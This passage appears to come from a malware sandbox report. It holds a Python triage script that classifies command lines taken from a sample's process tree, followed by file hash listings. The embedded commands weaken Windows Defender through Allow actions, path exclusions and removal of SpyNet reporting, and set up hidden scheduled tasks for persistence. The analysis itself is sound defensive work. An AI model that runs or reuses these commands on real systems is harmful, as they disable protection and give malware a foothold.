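ENCODED = "cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

# Constructed sample: command lines copied from the process tree above.
COMMANDS = [
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pGMaoMOmU" /t REG_DWORD /d 0 /reg:64',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\uOKUZcIdbhBstHVB /t REG_DWORD /d 0 /reg:32',
    r'REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64',
    'schtasks /CREATE /TN "gToLbSxfR" /SC once /ST 05:08:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand %s"' % ENCODED,
    'schtasks /run /I /tn "gToLbSxfR"',
    'schtasks /DELETE /F /TN "gToLbSxfR"',
    r'schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\pGMaoMOmU\gqYIPc.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "yKRLlrVxZRCwfvY" /V1 /F',
    r'"C:\Windows\system32\gpupdate.exe" /force',
]

# ThreatAction values accepted by the ThreatIDDefaultAction policy (the
# enumeration Set-MpPreference -ThreatIDDefaultAction documents): 6 is Allow.
THREAT_ACTION = {1: "Clean", 2: "Quarantine", 3: "Remove", 6: "Allow",
                 8: "UserDefined", 9: "NoAction", 10: "Block"}

_REG_OP = re.compile(r'(?i)\breg(?:\.exe")?\s+(add|delete)\s+"([^"]+)"')
_REG_VIEW = re.compile(r"/reg:(\d+)")
_TASK = re.compile(r"(?i)^\s*schtasks\s+/(\w+)")
_ENC = re.compile(r"-EncodedCommand\s+([A-Za-z0-9+/=]+)")


def _switch(cmd, name):
    """Value after a /name switch, quoted or bare; None when it is absent."""
    m = re.search(r"(?i)(?<!\S)" + re.escape(name) + r'\s+(?:"([^"]*)"|(\S+))', cmd)
    return None if not m else (m.group(1) if m.group(1) is not None else m.group(2))


def decode_encoded_command(b64):
    """powershell -EncodedCommand carries the script as base64 over UTF-16LE."""
    return base64.b64decode(b64).decode("utf-16-le")


def classify(cmd):
    """Describe one command line as a finding dict, or None if unremarkable."""
    m = _REG_OP.search(cmd)
    if m:
        op, key = m.group(1).upper(), m.group(2)
        view = _REG_VIEW.search(cmd)
        f = {"op": op, "key": key, "view": view.group(1) if view else None}
        tail = key.lower()
        if op == "ADD" and tail.endswith(r"\threats\threatiddefaultaction"):
            code = int(_switch(cmd, "/d"))
            f.update(category="defender_threat_action", threat_id=int(_switch(cmd, "/v")),
                     action=THREAT_ACTION.get(code, "unknown(%d)" % code))
        elif op == "ADD" and tail.endswith(r"\windows defender\exclusions\paths"):
            f.update(category="defender_path_exclusion", path=_switch(cmd, "/v"))
        elif op == "DELETE" and tail.endswith(r"\windows defender\spynet"):
            f.update(category="defender_spynet_value_removed", value=_switch(cmd, "/v"))
        else:
            f.update(category="registry_" + op.lower())
        return f
    t = _TASK.match(cmd)
    if t:
        f = {"category": "scheduled_task", "action": t.group(1).upper(),
             "name": _switch(cmd, "/tn"), "run_as": _switch(cmd, "/ru"),
             "schedule": _switch(cmd, "/sc")}
        enc = _ENC.search(cmd)
        if enc:
            f["decoded_command"] = decode_encoded_command(enc.group(1))
        if "rundll32" in cmd.lower():
            f["launcher"] = "rundll32"
        return f
    return None


def triage(commands):
    """Summarise Defender tampering and task persistence across a command list."""
    findings = [f for f in map(classify, commands) if f]
    tasks = [f for f in findings if f["category"] == "scheduled_task"]
    actions = {}
    for f in tasks:
        actions.setdefault(f["name"], set()).add(f["action"])
    summary = {
        "threat_ids_set_to_allow": sorted(f["threat_id"] for f in findings
            if f["category"] == "defender_threat_action" and f["action"] == "Allow"),
        "excluded_paths": sorted(f["path"] for f in findings
            if f["category"] == "defender_path_exclusion"),
        "spynet_values_removed": sorted(f["value"] for f in findings
            if f["category"] == "defender_spynet_value_removed"),
        "tasks_running_as_system": sorted(f["name"] for f in tasks
            if f["action"] == "CREATE" and (f["run_as"] or "").upper() == "SYSTEM"),
        # created, fired at once and deleted: a task used as a one-shot launcher
        "one_shot_tasks": sorted(n for n, a in actions.items() if {"CREATE", "RUN", "DELETE"} <= a),
        "decoded_task_commands": [f["decoded_command"] for f in tasks if "decoded_command" in f],
    }
    return findings, summary


if __name__ == "__main__":
    found, report = triage(COMMANDS)
    for item in found:
        print(item)
    print(report)
```

Run stand-alone it prints each finding and the summary. The decoded task command is start-process -WindowStyle Hidden gpupdate.exe /force, which matches the gpupdate.exe /force child visible under the powershell.EXE process in the tree; the /reg:32 and /reg:64 views are kept separately because the sample writes every policy value into both registry views.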
Network
MITRE ATT&CK Enterprise v6
Downloads
-
Filesize 2KB
MD5 95d2816ffeb92607c0f405cfd8b2e6e9
SHA1 c31a270411d5c33d41158a90aae7fb4082170d7a
SHA256 bf41005bdc2b696500e1c6fb7129e5bef35dac2781282ba01a7cc6454fa5c91b
SHA512 4cd1d6fe8cc9e8e79c32ab16e1fc6ae4cc278b46fa0629cc21c2e8dd57589d5b9c6e50023d8e644dafeff2f10686e5e89b2e25345397f154de7f43f5753c9c84
-
Filesize 2KB
MD5 25ff596e693710af8e7612a6a6635b45
SHA1 b9fb6c6c9f50c28a4584c3ed84d70320b545308c
SHA256 68d35771b32a517b18c68235c035d327afafd23a389cf69aff23e65572e57180
SHA512 a8c7b079db0e0bd19d7372f5382e14860213c9691c9144992f82863f0106cb0ee17f8bb17b1973a2ecffa61fa1ee372b3b69328a8fd43f292895e59c3ffdecdf
-
Filesize 2KB
MD5 862a1810bc4f7218ed8a26c522d1b71c
SHA1 a3c19194bb1b40e190b3e1e9d2a7b842ff3c8c0b
SHA256 828502747afa51a4cd8c8c3c4ab215e7eef303376c792941b06aa78526e57c44
SHA512 3d2de5965c63d2db04f8970acbc77edd49d0c1940568e4b1fbd5893d8fd9cd4ccb95c707f0d6285686d4fb8919853e7a0de3f40da54a05bb9dda75b958f81281
-
Filesize 2KB
MD5 1d95b0160dce1ef68067176dd74af5ee
SHA1 981eca90a326f32bdac13af39247d68c6fd25cdf
SHA256 ead2a25fe164d66ffe9553a2ba50e4cebc45ad7bc91c83051ec83148afd4c639
SHA512 59f1329999ee348b925ac56e19abec6c25645f73f7643ffe9ce209ca9ac737e77fb91305b726face5a96efa6c4bca5cc601c7ac1b31ee1a9adbe24e2b9bb2197
-
Filesize 2KB
MD5 cfd64cb7f207e978b49c3fb62de8d44b
SHA1 131611711bcf907a064f843b20f1f785494d8d8e
SHA256 0712f38e0c621f572511da7d93c42cfdc2c2945a0d6c24096280e54453ccce7c
SHA512 61d00e5bb54d0272cd8ae0aee6ae46298a9796a07701ebd1c7a0b03b56c8310b798596bee5b7ada25ab32eb462a339340a83e3dd6324eb56c1bae2fc4a8cf9ea
-
Filesize 2KB
MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize 64B
MD5 d8b9a260789a22d72263ef3bb119108c
SHA1 376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256 d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
(identical entry listed twice in the report)
Filesize 6.3MB
MD5 05c36c1285f91afcfa0b49341acfd4b1
SHA1 a50b777584540c57f938da1fcc5f10845ef3de23
SHA256 242181a19834f9fb0ef96b1ccd8c0070d1759d64e84dfddcc2b65b12babce679
SHA512 c6585fa702987f7ac02191cecba70055b94075978e199521fd8b7495351b3a014d79be2b0331f9c9b4aa65567779f15b879ee0270b78c08ca8aa7089425ea9ae
-
(identical entry listed four times in the report)
Filesize 6.8MB
MD5 195ac65216aad2f39a63ab39efbe915e
SHA1 80acc3f5e5c31a58acf1300cd4036054ef8d1d68
SHA256 6f75e52149b0cd3bfa595d220c3aa28362734a767783560959e621a4596c12fc
SHA512 dc039485497227fb032aaedb5eb7bbb28e02eb4e93cbb25bc976cc8c6ef9d62bc9a327ae88edfc694f50549ddea3497fcd14eb8d71ec5c53d56c3bcc83a7216e
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize 1KB
MD5 33b19d75aa77114216dbc23f43b195e3
SHA1 36a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256 b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize 11KB
MD5 1fa3b8d699db2f1d6ac367d0fd84a88d
SHA1 baab5cf03b13beb39c06b3a4dba97e0659618c43
SHA256 54d5db2bc80acd62c0bf06a1aa4a5703ceafa6ef84966e13c9596ea87ae21279
SHA512 396d05e369250f6a42b911362a28d07931c5d86b517bf3b06d0fa1afa415116266f4857287eb3bf90466fb43e22491ccf4d2beb95cacfe735b9ed5cb16ffd65f
-
(identical entry listed twice in the report)
Filesize 6.2MB
MD5 8a3a40b1e33abc103e2ad313b08893d9
SHA1 a3dfeb31e70b046b5a1c64af8944192f50a100d8
SHA256 814348c8b02b0b85dcd8f8cffe5510cf0b16cc97bfca143dde161b93b3d18a04
SHA512 7001ba5ce25b5f4dea6c5ec7226f8013ad44f4ed4c0b339d28358b3c4f933a4f52b75a9beb186f43fe735797f88f19e464a1cb4ef62e92d1deb8c024312c3ea8
-
(same 6.8MB file as above, listed a further two times in the report)
Filesize 6.8MB
MD5 195ac65216aad2f39a63ab39efbe915e
SHA1 80acc3f5e5c31a58acf1300cd4036054ef8d1d68
SHA256 6f75e52149b0cd3bfa595d220c3aa28362734a767783560959e621a4596c12fc
SHA512 dc039485497227fb032aaedb5eb7bbb28e02eb4e93cbb25bc976cc8c6ef9d62bc9a327ae88edfc694f50549ddea3497fcd14eb8d71ec5c53d56c3bcc83a7216e
-
Filesize 5KB
MD5 a65047f6c484d322339140e4e5b79f44
SHA1 806b2b50cb7bb2a6f7d2de96ff7fb6db52bd542e
SHA256 3d2c7eaf69512748b5726e7db9c3c0e1e06da2a6efe417665f3712ce62c9002f
SHA512 e4b035dba8183690b45f77298dda96bdc40ebf7659cf339e45b7a65d0cf05da6dca27e99cdb3bd7bf692f1bdebd7f6e54265a4244945799d5b3f5d4943f90966
-
Filesize 268B
MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732